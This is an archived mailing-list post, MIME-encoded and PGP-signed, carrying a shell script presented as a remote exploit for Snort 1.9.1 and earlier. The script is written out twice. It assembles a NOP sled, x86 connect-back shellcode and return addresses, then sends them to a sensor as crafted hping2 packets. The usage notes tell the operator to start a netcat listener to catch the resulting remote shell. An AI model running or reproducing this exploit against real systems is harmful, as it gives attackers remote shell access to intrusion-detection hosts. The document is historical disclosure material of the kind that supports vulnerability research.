--/NkBOFFp2J2Af1nK
Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS"
Content-Disposition: inline
--qMm9M+Fa2AknHoGS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Here is some proof of concept code for the snort <=3D1.9.1 vuln.
--=20
/* truff (truff@projet7.org)
* pgp public key: http://projet7.tuxfamily.org/pgp/truff.pgp
* http://www.projet7.org (Security Researchs)
*/
--qMm9M+Fa2AknHoGS
Content-Type: application/x-sh
Content-Disposition: attachment; filename="p7snort191.sh"
Content-Transfer-Encoding: quoted-printable
#!/bin/sh=0A=0A##########################################################=
=0A# p7snort191.sh by truff (truff@projet7.org) #=0A# Snort 1.9=
.1 and below remote exploit #=0A# =
#=0A# Tested on Slackware 8.0 with Snort 1.=
9.1 from sources #=0A# =
#=0A# Usage: #=0A# 1/ L=
aunch a listening netcat to listen for the shell #=0A# nc -p 45295 -l =
#=0A# =
#=0A# 2/ p7snort119.sh yourIP [Ret_Addr] =
#=0A# #=0A#=
Where yourIP is the IP where the netcat is listening #=0A# and Ret_Addr =
is the address (8 hexa digits) of the #=0A# shellcode (eg: 0819fec2) =
#=0A# =
#=0A# =
#=0A# This vulnerability was discovered by Bruce Leidl, #=0A# Juan Pab=
lo Martinez Kuhn, and Alejandro David Weil #=0A# from Core Security Tec=
hnologies during Bugweek 2003. #=0A# =
#=0A# Greetz to #root people and projet7 members. =
#=0A# Special thx to mycroft for helping me with shell #=0A# scr=
ipting stuff. #=0A# =
#=0A# www.projet7.org =
- Security Researchs - #=0A###############################################=
###########=0A=0A=0A# Put here the path to your hping2 binary=0AHPING2=3D/u=
sr/sbin/hping2=0A=0A# You should change these params to make the snort sens=
or =0A# capture the packets.=0AIPSRC=3D192.168.22.1=0AIPDST=3D192.168.22.2=
=0APTSRC=3D3339=0APTDST=3D111=0A=0A=0A=0Aecho "p7snort191.sh by truff (truf=
f@projet7.org)"=0A=0Acase $# in=0A 0)=0A echo "Bad number of params"=0A=
echo "Read comments in sources"=0A exit -1=0A ;;=0A 1)=0A RET=
=3D0819fec2=0A echo "Using default retaddr (Slackware 8.0)"=0A echo $=
RET=0A ;;=0A 2)=0A RET=3D$2=0A echo "Using custom retaddr"=0A =
echo $RET=0A ;;=0A *)=0A echo "Bad number of params"=0A echo "Rea=
d comments in sources"=0A exit -1=0A ;;=0Aesac=0A =0A =0A=0A# Nop=
s=0Ai=3D0=0Awhile [ "$i" -lt "512" ]; do=0A i=3D$(expr "$i" + 1)=0A echo =
-n -e "\x90" >> egg=0Adone=0A=0A=0A# linux x86 shellcode by eSDee of Netric=
(www.netric.org)=0A# 131 byte - connect back shellcode (port=3D0xb0ef)=0Ae=
cho -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg=0Aecho -n -e "\x06\x51\=
xb1\x01\x51\xb1\x02\x51" >> egg=0Aecho -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\=
x80" >> egg=0Aecho -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg=0Aecho -=
n -e "\x68" >> egg=0A=0A# IP here =0Aecho -n -e $(printf "\\\x%02x" $(echo =
$1 | cut -d. -f1) \=0A $(echo $1 | cut -d. -f=
2) \=0A $(echo $1 | cut -d. -f3) \=0A =
$(echo $1 | cut -d. -f4)) >> egg=0A=0Aecho -n -e "\x=
66\x68\xb0" >> egg=0Aecho -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg=
=0Aecho -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg=0Aecho -n -e "\xb0\=
x66\xcd\x80\x31\xc9\x39\xc1" >> egg =0Aecho -n -e "\x74\x06\x31\xc0\xb0\x01=
\xcd\x80" >> egg=0Aecho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg=0Ae=
cho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg=0Aecho -n -e "\xcd\x80\=
x31\xc0\xb0\x3f\x89\xd3" >> egg=0Aecho -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\=
xd2" >> egg=0Aecho -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg=0Aecho -=
n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg=0Aecho -n -e "\xe1\xb0\x0b\x=
cd\x80\x31\xc0\xb0" >> egg=0Aecho -n -e "\x01\xcd\x80" >> egg=0A=0A# 3 dumm=
y bytes for alignment purposes=0Aecho -n -e "\x41\x41\x41" >> egg=0A=0Ai=3D=
0=0Acpt=3D$(expr 3840 - 134 - 512)=0Acpt=3D$(expr $cpt / 4)=0A=0A=0Avar1=3D=
0x$(echo $RET | cut -b7,8)=0Avar2=3D0x$(echo $RET | cut -b5,6)=0Avar3=3D0x$=
(echo $RET | cut -b3,4)=0Avar4=3D0x$(echo $RET | cut -b1,2)=0A=0Awhile [ "$=
i" -lt "$cpt" ]; do=0A i=3D$(expr "$i" + 1)=0A echo -n -e $(printf "\\\x%=
02x" $var1 $var2 $var3 $var4) >> egg=0Adone=0A=0A=0A# hping ruleZ=0A$HPING2=
$IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A -d 0x1 -=
-setseq 0xffff0023 --setack 0xc0c4c014 \=0A 1>/dev/null 2>/dev/null=
=0A=0A$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A =
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \=0A 1>=
/dev/null 2>/dev/null=0A=0A$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --a=
ck -c 1 \=0A -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \=0A =
1>/dev/null 2>/dev/null=0A=0Arm egg=0A=0Aecho "Exploit Sended"=0A=0A
--qMm9M+Fa2AknHoGS--
--/NkBOFFp2J2Af1nK
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Content-Type: multipart/mixed; boundary="qMm9M+Fa2AknHoGS"
Content-Disposition: inline
- --qMm9M+Fa2AknHoGS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Here is some proof of concept code for the snort <=3D1.9.1 vuln.
- --=20
/* truff (truff@projet7.org)
* pgp public key: http://projet7.tuxfamily.org/pgp/truff.pgp
* http://www.projet7.org (Security Researchs)
*/
- --qMm9M+Fa2AknHoGS
Content-Type: application/x-sh
Content-Disposition: attachment; filename="p7snort191.sh"
Content-Transfer-Encoding: quoted-printable
#!/bin/sh=0A=0A##########################################################=
=0A# p7snort191.sh by truff (truff@projet7.org) #=0A# Snort 1.9=
.1 and below remote exploit #=0A# =
#=0A# Tested on Slackware 8.0 with Snort 1.=
9.1 from sources #=0A# =
#=0A# Usage: #=0A# 1/ L=
aunch a listening netcat to listen for the shell #=0A# nc -p 45295 -l =
#=0A# =
#=0A# 2/ p7snort119.sh yourIP [Ret_Addr] =
#=0A# #=0A#=
Where yourIP is the IP where the netcat is listening #=0A# and Ret_Addr =
is the address (8 hexa digits) of the #=0A# shellcode (eg: 0819fec2) =
#=0A# =
#=0A# =
#=0A# This vulnerability was discovered by Bruce Leidl, #=0A# Juan Pab=
lo Martinez Kuhn, and Alejandro David Weil #=0A# from Core Security Tec=
hnologies during Bugweek 2003. #=0A# =
#=0A# Greetz to #root people and projet7 members. =
#=0A# Special thx to mycroft for helping me with shell #=0A# scr=
ipting stuff. #=0A# =
#=0A# www.projet7.org =
- - Security Researchs - #=0A###############################################=
###########=0A=0A=0A# Put here the path to your hping2 binary=0AHPING2=3D/u=
sr/sbin/hping2=0A=0A# You should change these params to make the snort sens=
or =0A# capture the packets.=0AIPSRC=3D192.168.22.1=0AIPDST=3D192.168.22.2=
=0APTSRC=3D3339=0APTDST=3D111=0A=0A=0A=0Aecho "p7snort191.sh by truff (truf=
f@projet7.org)"=0A=0Acase $# in=0A 0)=0A echo "Bad number of params"=0A=
echo "Read comments in sources"=0A exit -1=0A ;;=0A 1)=0A RET=
=3D0819fec2=0A echo "Using default retaddr (Slackware 8.0)"=0A echo $=
RET=0A ;;=0A 2)=0A RET=3D$2=0A echo "Using custom retaddr"=0A =
echo $RET=0A ;;=0A *)=0A echo "Bad number of params"=0A echo "Rea=
d comments in sources"=0A exit -1=0A ;;=0Aesac=0A =0A =0A=0A# Nop=
s=0Ai=3D0=0Awhile [ "$i" -lt "512" ]; do=0A i=3D$(expr "$i" + 1)=0A echo =
- -n -e "\x90" >> egg=0Adone=0A=0A=0A# linux x86 shellcode by eSDee of Netric=
(www.netric.org)=0A# 131 byte - connect back shellcode (port=3D0xb0ef)=0Ae=
cho -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg=0Aecho -n -e "\x06\x51\=
xb1\x01\x51\xb1\x02\x51" >> egg=0Aecho -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\=
x80" >> egg=0Aecho -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg=0Aecho -=
n -e "\x68" >> egg=0A=0A# IP here =0Aecho -n -e $(printf "\\\x%02x" $(echo =
$1 | cut -d. -f1) \=0A $(echo $1 | cut -d. -f=
2) \=0A $(echo $1 | cut -d. -f3) \=0A =
$(echo $1 | cut -d. -f4)) >> egg=0A=0Aecho -n -e "\x=
66\x68\xb0" >> egg=0Aecho -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg=
=0Aecho -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg=0Aecho -n -e "\xb0\=
x66\xcd\x80\x31\xc9\x39\xc1" >> egg =0Aecho -n -e "\x74\x06\x31\xc0\xb0\x01=
\xcd\x80" >> egg=0Aecho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg=0Ae=
cho -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg=0Aecho -n -e "\xcd\x80\=
x31\xc0\xb0\x3f\x89\xd3" >> egg=0Aecho -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\=
xd2" >> egg=0Aecho -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg=0Aecho -=
n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg=0Aecho -n -e "\xe1\xb0\x0b\x=
cd\x80\x31\xc0\xb0" >> egg=0Aecho -n -e "\x01\xcd\x80" >> egg=0A=0A# 3 dumm=
y bytes for alignment purposes=0Aecho -n -e "\x41\x41\x41" >> egg=0A=0Ai=3D=
0=0Acpt=3D$(expr 3840 - 134 - 512)=0Acpt=3D$(expr $cpt / 4)=0A=0A=0Avar1=3D=
0x$(echo $RET | cut -b7,8)=0Avar2=3D0x$(echo $RET | cut -b5,6)=0Avar3=3D0x$=
(echo $RET | cut -b3,4)=0Avar4=3D0x$(echo $RET | cut -b1,2)=0A=0Awhile [ "$=
i" -lt "$cpt" ]; do=0A i=3D$(expr "$i" + 1)=0A echo -n -e $(printf "\\\x%=
02x" $var1 $var2 $var3 $var4) >> egg=0Adone=0A=0A=0A# hping ruleZ=0A$HPING2=
$IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A -d 0x1 -=
- -setseq 0xffff0023 --setack 0xc0c4c014 \=0A 1>/dev/null 2>/dev/null=
=0A=0A$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \=0A =
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \=0A 1>=
/dev/null 2>/dev/null=0A=0A$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --a=
ck -c 1 \=0A -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \=0A =
1>/dev/null 2>/dev/null=0A=0Arm egg=0A=0Aecho "Exploit Sended"=0A=0A
- --qMm9M+Fa2AknHoGS--
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE+ppSOh82dJ0V11s8RAq5GAJ9L3TXtPYa01+BbED+McNknou2DiQCfVuN5
WV/73pn3esMTb8gwkhjcDrk=
=9Dt8
-----END PGP SIGNATURE-----
--/NkBOFFp2J2Af1nK--
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH